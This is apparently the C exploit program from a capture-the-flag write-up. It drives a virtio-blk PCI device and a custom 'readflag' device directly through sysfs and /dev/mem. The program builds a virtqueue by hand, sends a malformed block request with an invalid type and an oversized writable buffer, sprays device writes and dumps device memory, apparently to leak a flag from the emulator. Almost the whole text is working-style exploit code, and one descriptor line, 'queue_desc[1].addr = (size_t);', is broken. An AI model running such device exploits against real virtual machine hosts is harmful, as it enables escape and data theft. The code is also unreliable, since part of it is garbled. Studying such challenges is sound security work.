/* Values of virtio_pci_cap.cfg_type: which virtio structure a capability
 * describes. */
enum virtio_pci_cfg_type{
VIRTIO_PCI_CAP_COMMON_CFG = 0x1, /* Common configuration */
VIRTIO_PCI_CAP_NOTIFY_CFG = 0x2, /* Notifications */
VIRTIO_PCI_CAP_ISR_CFG = 0x3, /* ISR Status */
VIRTIO_PCI_CAP_DEVICE_CFG = 0x4, /* Device specific configuration */
VIRTIO_PCI_CAP_PCI_CFG = 0x5, /* PCI configuration access */
VIRTIO_PCI_CAP_SHARED_MEMORY = 0x8, /* Shared memory region */
VIRTIO_PCI_CAP_VENDOR_CFG = 0x9, /* Vendor-specific data */
};

/* Feature bits */
#define VIRTIO_BLK_F_SIZE_MAX 1 /* Indicates maximum segment size */
#define VIRTIO_BLK_F_SEG_MAX 2 /* Indicates maximum # of segments */
#define VIRTIO_BLK_F_GEOMETRY 4 /* Legacy geometry available */
#define VIRTIO_BLK_F_RO 5 /* Disk is read-only */
#define VIRTIO_BLK_F_BLK_SIZE 6 /* Block size of disk is available*/
#define VIRTIO_BLK_F_FLUSH 9 /* Flush command supported */
#define VIRTIO_BLK_F_TOPOLOGY 10 /* Topology information is available */
#define VIRTIO_BLK_F_MQ 12 /* support more than one vq */
#define VIRTIO_BLK_F_DISCARD 13 /* DISCARD is supported */
#define VIRTIO_BLK_F_WRITE_ZEROES 14 /* WRITE ZEROES is supported */
#define VIRTIO_BLK_F_SECURE_ERASE 16 /* Secure Erase is supported */

/* Status byte for guest to report progress, and synchronize features. */
/* We have seen device and processed generic fields (VIRTIO_CONFIG_F_VIRTIO) */
#define VIRTIO_CONFIG_S_ACKNOWLEDGE 1
/* We have found a driver for the device. */
#define VIRTIO_CONFIG_S_DRIVER 2
/* Driver has used its parts of the config, and is happy */
#define VIRTIO_CONFIG_S_DRIVER_OK 4
/* Driver has finished configuring features */
#define VIRTIO_CONFIG_S_FEATURES_OK 8
/* Device entered invalid state, driver must reset it */
#define VIRTIO_CONFIG_S_NEEDS_RESET 0x40
/* We've given up on this device. */
#define VIRTIO_CONFIG_S_FAILED 0x80

#define VIRTIO_QUEUE_SIZE 0x10

/* One descriptor-table entry: a single guest buffer, optionally chained to
 * another entry through `next`. */
struct virtq_desc {
/* Address (guest-physical). */
le64 addr;
/* Length. */
le32 len;
/* This marks a buffer as continuing via the next field. */
#define VIRTQ_DESC_F_NEXT 1
/* This marks a buffer as device write-only (otherwise device read-only). */
#define VIRTQ_DESC_F_WRITE 2
/* This means the buffer contains a list of buffer descriptors. */
#define VIRTQ_DESC_F_INDIRECT 4
/* The flags as indicated above. */
le16 flags;
/* Next field if flags & NEXT */
le16 next;
};

/* Driver area ("avail" ring) of the split virtqueue, written by main(). */
struct virtq_avail {
#define VIRTQ_AVAIL_F_NO_INTERRUPT 1
le16 flags;
le16 idx;
/* One slot per queue entry. */
le16 ring[VIRTIO_QUEUE_SIZE];
le16 used_event; /* Only if VIRTIO_F_EVENT_IDX */
};

/* One entry of the used ring. */
struct virtq_used_elem {
/* Index of start of used descriptor chain. */
le32 id;

/*
* The number of bytes written into the device writable portion of
* the buffer described by the descriptor chain.
*/
le32 len;
};

/* Device area ("used" ring) of the split virtqueue. */
struct virtq_used {
#define VIRTQ_USED_F_NO_NOTIFY 1
le16 flags;
le16 idx;
/* One slot per queue entry. */
struct virtq_used_elem ring[VIRTIO_QUEUE_SIZE];
le16 avail_event; /* Only if VIRTIO_F_EVENT_IDX */
};

/*
 * Header of a virtio-blk request as placed in the first (device-readable)
 * descriptor. Payload bytes, if any, follow the header; the status byte is
 * carried by a separate descriptor and is therefore not a member here.
 */
struct virtio_blk_req {
    le32 type;      /* one of VIRTIO_BLK_T_* */
    le32 reserved;
    le64 sector;
    u8 data[];      /* C99 flexible array member (was the GNU `data[0]` form) */
    // u8 status;
};

#define VIRTIO_BLK_T_IN 0
#define VIRTIO_BLK_T_OUT 1
#define VIRTIO_BLK_T_FLUSH 4
#define VIRTIO_BLK_T_GET_ID 8
#define VIRTIO_BLK_T_GET_LIFETIME 10
#define VIRTIO_BLK_T_DISCARD 11
#define VIRTIO_BLK_T_WRITE_ZEROES 13
#define VIRTIO_BLK_T_SECURE_ERASE 14


/*
 * Print every field of one virtio PCI capability to stdout in hex, with
 * cfg_type decoded to a readable name ("unknown" for unlisted values).
 */
void print_cap(struct virtio_pci_cap* cap){
    const char* type_line;

    printf("cap_len: %x\n", cap->cap_len);

    /* Pick the line describing the structure type, then emit it once. */
    switch(cap->cfg_type){
    case VIRTIO_PCI_CAP_COMMON_CFG:
        type_line = "cfg_type: common\n";
        break;
    case VIRTIO_PCI_CAP_NOTIFY_CFG:
        type_line = "cfg_type: notify\n";
        break;
    case VIRTIO_PCI_CAP_ISR_CFG:
        type_line = "cfg_type: isr\n";
        break;
    case VIRTIO_PCI_CAP_DEVICE_CFG:
        type_line = "cfg_type: device\n";
        break;
    case VIRTIO_PCI_CAP_PCI_CFG:
        type_line = "cfg_type: pci\n";
        break;
    case VIRTIO_PCI_CAP_SHARED_MEMORY:
        type_line = "cfg_type: shared memory\n";
        break;
    case VIRTIO_PCI_CAP_VENDOR_CFG:
        type_line = "cfg_type: vendor\n";
        break;
    default:
        type_line = "cfg_type: unknown\n";
        break;
    }
    fputs(type_line, stdout);

    printf("bar: %x\n", cap->bar);
    printf("id: %x\n", cap->id);
    printf("offset: %x\n", cap->offset);
    printf("length: %x\n", cap->length);
}

/*
 * Fatal-error helper: report `buf` together with the current errno text via
 * perror(), then terminate the process with abort(). Does not return.
 */
void ERR(const char* buf)
{
    perror(buf);    /* message goes to stderr */
    abort();
}

/*
 * Write the NUL-terminated string `buf` to file descriptor 2 (stderr),
 * bypassing stdio buffering. Short writes are continued until the whole
 * string is out; the helper gives up silently if write() fails or makes no
 * progress.
 */
void LOG(const char* buf){
    size_t remaining = strlen(buf);

    while(remaining > 0){
        ssize_t written = write(2, buf, remaining);
        if(written <= 0){
            break;
        }
        buf += written;
        remaining -= (size_t)written;
    }
}

/* Shared state filled in by init_readflag() / init_virtio() and used by
 * spray() and main(). */
/* Mapping of the readflag device's resource0. */
volatile char* readflag_mmio = NULL;
/* Mapping of the virtio device's resource4. */
volatile char* virtio_mmio = NULL;
/* Locations inside virtio_mmio, taken from the PCI capability list. */
volatile char* virtio_common_mmio = NULL;
volatile struct virtio_notify_cfg* virtio_notify_mmio = NULL;
volatile char* virtio_isr_mmio = NULL;
volatile char* virtio_device_mmio = NULL;
/* /dev/mem mapping that holds the rings (dma_mem) and request data (dma_data). */
volatile char* dma_mem = NULL;
volatile char* dma_data = NULL;
/* Split virtqueue areas, all located inside dma_mem. */
volatile struct virtq_desc* queue_desc = NULL;
volatile struct virtq_avail* queue_avail = NULL;
volatile struct virtq_used* queue_used = NULL;

/*
 * Map the first 0x1000 bytes of resource0 of the PCI function at
 * 0000:00:05.0 (the readflag device) read/write and publish the mapping in
 * readflag_mmio. Terminates the process through ERR() on failure.
 */
void init_readflag(){
    const int open_flags = O_RDWR | O_SYNC;
    int fd = open("/sys/devices/pci0000:00/0000:00:05.0/resource0", open_flags);
    if(fd < 0){
        ERR("Open readflag");
    }

    void* window = mmap(0, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0);
    readflag_mmio = window;
    if(window == MAP_FAILED){
        ERR("mmap mmio_mem");
    }
    /* The mapping stays valid after the descriptor is closed. */
    close(fd);

    puts("readflag init done");
}

/* Perform exactly one volatile 8-bit load from addr and return the value. */
uint8_t mmio_read8(void* addr){
    volatile uint8_t* reg = addr;
    uint8_t value = *reg;
    return value;
}

/* Perform exactly one volatile 16-bit load from addr and return the value. */
uint16_t mmio_read16(void* addr){
    volatile uint16_t* reg = addr;
    uint16_t value = *reg;
    return value;
}

/* Perform exactly one volatile 32-bit load from addr and return the value. */
uint32_t mmio_read32(void* addr){
    volatile uint32_t* reg = addr;
    uint32_t value = *reg;
    return value;
}

/* Perform exactly one volatile 64-bit load from addr and return the value. */
uint64_t mmio_read64(void* addr){
    volatile uint64_t* reg = addr;
    uint64_t value = *reg;
    return value;
}

/* Perform exactly one volatile 8-bit store of val to addr. */
void mmio_write8(void* addr, uint8_t val){
    volatile uint8_t* reg = addr;
    *reg = val;
}

/* Perform exactly one volatile 16-bit store of val to addr. */
void mmio_write16(void* addr, uint16_t val){
    volatile uint16_t* reg = addr;
    *reg = val;
}

/* Perform exactly one volatile 32-bit store of val to addr. */
void mmio_write32(void* addr, uint32_t val){
    volatile uint32_t* reg = addr;
    *reg = val;
}

/* Perform exactly one volatile 64-bit store of val to addr. */
void mmio_write64(void* addr, uint64_t val){
    volatile uint64_t* reg = addr;
    *reg = val;
}

/*
 * Full memory barrier: issues the x86 `mfence` instruction and, through the
 * "memory" clobber, also stops the compiler from moving memory accesses
 * across this point. Spelled with the __asm__ alternate keyword so it
 * still compiles in strict ISO modes such as -std=c11, where plain `asm`
 * is not a keyword.
 */
void mb(){
    __asm__ __volatile__("mfence" ::: "memory");
}

void init_virtio() {
int fd = open("/sys/devices/pci0000:00/0000:00:04.0/config", O_RDONLY);
if(fd < 0){
ERR("Open virtio config");
}
struct virtio_pci_cap cap;
char* config = malloc(0x1000);
int bytes_read = read(fd, config, 0x1000);
if(bytes_read < 0){
ERR("Read virtio config");
}

fd = open("/sys/devices/pci0000:00/0000:00:04.0/resource4", O_RDWR | O_SYNC);
if(fd < 0){
ERR("Open virtio resource4");
}
virtio_mmio = mmap(0, 0x4000, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0);
if(virtio_mmio == (volatile void*)-1){
ERR("mmap virtio mem");
}
close(fd);

u8 cap_ptr = *(u8*)(config+0x34);
while(cap_ptr != 0){
if(config[cap_ptr] != 0x9){
cap_ptr = *(u8*)(config+cap_ptr+1);
continue;
}
memcpy(&cap, config+cap_ptr, sizeof(cap));
print_cap(&cap);
switch(cap.cfg_type){
case VIRTIO_PCI_CAP_COMMON_CFG:
virtio_common_mmio = virtio_mmio + cap.offset;
break;
case VIRTIO_PCI_CAP_NOTIFY_CFG:
virtio_notify_mmio = (struct virtio_notify_cfg*)((size_t)virtio_mmio + cap.offset);
break;
case VIRTIO_PCI_CAP_ISR_CFG:
virtio_isr_mmio = virtio_mmio + cap.offset;
break;
case VIRTIO_PCI_CAP_DEVICE_CFG:
virtio_device_mmio = virtio_mmio + cap.offset;
break;
default:
break;
}
cap_ptr = cap.cap_next;
}
close(fd);
free(config);

struct virtio_pci_common_cfg* common_cfg = (struct virtio_pci_common_cfg*)virtio_common_mmio;
mmio_write32(&common_cfg->device_feature_select, 0);
printf("device_feature[0]: %x\n", mmio_read32(&common_cfg->device_feature));
mmio_write32(&common_cfg->device_feature_select, 1);
printf("device_feature[1]: %x\n", mmio_read32(&common_cfg->device_feature));
mmio_write32(&common_cfg->driver_feature_select, 0);
printf("driver_feature[0]: %x\n", mmio_read32(&common_cfg->driver_feature));
mmio_write32(&common_cfg->driver_feature_select, 1);
printf("driver_feature[1]: %x\n", mmio_read32(&common_cfg->driver_feature));

struct virtio_blk_config* blk_cfg = (struct virtio_blk_config*)virtio_device_mmio;
printf("capacity: %lx\n", mmio_read64(&blk_cfg->capacity));
printf("size_max: %x\n", mmio_read32(&blk_cfg->size_max));
printf("seg_max: %x\n", mmio_read32(&blk_cfg->seg_max));
printf("geometry.cylinders: %x\n", mmio_read16(&blk_cfg->geometry.cylinders));
printf("geometry.heads: %x\n", mmio_read8(&blk_cfg->geometry.heads));
printf("geometry.sectors: %x\n", mmio_read8(&blk_cfg->geometry.sectors));
printf("blk_size: %x\n", mmio_read32(&blk_cfg->blk_size));

// reset device
mmio_write8(&common_cfg->device_status, 0);
mmio_write8(&common_cfg->device_status, VIRTIO_CONFIG_S_ACKNOWLEDGE);
mmio_write8(&common_cfg->device_status, VIRTIO_CONFIG_S_DRIVER | VIRTIO_CONFIG_S_ACKNOWLEDGE);
mmio_write32(&common_cfg->driver_feature_select, 0);
mmio_write32(&common_cfg->driver_feature, 0); // disable all features
mmio_write8(&common_cfg->device_status, VIRTIO_CONFIG_S_FEATURES_OK | VIRTIO_CONFIG_S_DRIVER | VIRTIO_CONFIG_S_ACKNOWLEDGE);
assert(mmio_read8(&common_cfg->device_status) & VIRTIO_CONFIG_S_FEATURES_OK);


// alloc dma memory
int dma_fd = open("/dev/mem", O_RDWR | O_SYNC);
if(dma_fd < 0){
ERR("Open dma");
}
dma_mem = mmap((void*)0x3ffdd000, 0x3000, PROT_READ | PROT_WRITE, MAP_SHARED, dma_fd, 0x3ffdd000);
if(dma_mem == (volatile void*)-1){
ERR("mmap dma mem");
}
*(volatile uint32_t*)dma_mem = 0x12345678;
printf("%x\n", *(volatile uint32_t*)dma_mem);
*(volatile uint32_t*)dma_mem = 0;
printf("dma_mem: %p\n", dma_mem);
dma_data = dma_mem + 0x1000;
queue_desc = (struct virtq_desc*)dma_mem;
queue_avail = (struct virtq_avail*)((char*)queue_desc + 0x10 * VIRTIO_QUEUE_SIZE);
queue_used = (struct virtq_used*)((char*)dma_mem + 0x200);

// init queue
mmio_write16(&common_cfg->queue_select, 0);
mmio_write16(&common_cfg->queue_size, VIRTIO_QUEUE_SIZE);
mmio_write64(&common_cfg->queue_desc, (size_t)0x3ffdd000);
mmio_write64(&common_cfg->queue_driver, (size_t)0x3ffdd100);
mmio_write64(&common_cfg->queue_device, (size_t)0x3ffdd200);
mmio_write16(&common_cfg->queue_enable, 1);

mmio_write8(&common_cfg->device_status, VIRTIO_CONFIG_S_DRIVER_OK | VIRTIO_CONFIG_S_FEATURES_OK | VIRTIO_CONFIG_S_DRIVER | VIRTIO_CONFIG_S_ACKNOWLEDGE);
puts("virtio init done");
}

/*
 * Issue one 32-bit write to offset 0 of the readflag MMIO window for every
 * value from 0xfff down to 0x2b in steps of 4.
 */
void spray(){
    int request_size = 0xfff;

    while(request_size > 0x28){
        mmio_write32((void*)readflag_mmio, request_size);
        request_size -= 4;
    }
}

/*
 * Print `size` bytes starting at `addr` to stdout as text: printable ASCII
 * (0x20..0x7e) is emitted as-is, every other byte as '?'. No separators or
 * trailing newline are written.
 *
 * The memory is fetched with 32-bit volatile loads, so `addr` should be
 * 4-byte aligned; a `size` that is not a multiple of 4 is rounded up to the
 * next full word. Bytes of each word are printed lowest-order byte first.
 */
void hexdump(void* addr, size_t size){
    const volatile uint8_t* base = addr;

    // dump 4 bytes per time
    for(size_t off = 0; off < size; off += 4){
        uint32_t word = *(const volatile uint32_t*)(base + off);
        for(unsigned shift = 0; shift < 32; shift += 8){
            uint8_t chr = (uint8_t)(word >> shift);
            putchar((chr >= 0x20 && chr <= 0x7e) ? chr : '?');
        }
    }
}

int main(){
setbuf(stdout, NULL);
init_readflag();
init_virtio();

volatile struct virtio_blk_req* req = (struct virtio_blk_req*)dma_data;
req->type = 0xffffffffu;
req->sector = 0;
req->reserved = 0;

queue_desc[0].addr = (size_t)req;
queue_desc[0].len = 0x10;
queue_desc[0].flags = VIRTQ_DESC_F_NEXT;
queue_desc[0].next = 1;
queue_desc[1].addr = (size_t);
queue_desc[1].len = 0xfff;
queue_desc[1].flags = VIRTQ_DESC_F_WRITE | VIRTQ_DESC_F_NEXT;
queue_desc[1].next = 2;
queue_desc[2].addr = (size_t)dma_data + 0xa00;
queue_desc[2].len = 1;
queue_desc[2].flags = VIRTQ_DESC_F_WRITE;
queue_desc[2].next = 0;

queue_avail->flags = 1;
queue_avail->ring[0] = 0;
queue_avail->idx = 1;
mb();
mmio_write8((void*)virtio_isr_mmio, 1);
struct virtio_pci_common_cfg* common_cfg = (struct virtio_pci_common_cfg*)virtio_common_mmio;
void* notify_addr = (void*)((uintptr_t)virtio_notify_mmio + mmio_read32((void*)&virtio_notify_mmio->cap.offset) + mmio_read16(&common_cfg->queue_notify_off) * mmio_read32((void*)&virtio_notify_mmio->notify_off_multiplier));
puts("--------------------------------");
for(int i = 0; i < 0x100; i+=4){
spray();
}
mmio_write16(notify_addr, 0);
puts("--------------------------------");
hexdump((char*)virtio_common_mmio + 0x000, 0x100);

munmap(dma_mem, 0x3000);
munmap(virtio_mmio, 0x4000);
munmap(readflag_mmio, 0x1000);
}

References


  1. Virtual I/O Device (VIRTIO) Version 1.1↩︎

  2. Virtqueues and virtio ring: How the data travels↩︎

  3. Memory-mapped I/O and port-mapped I/O↩︎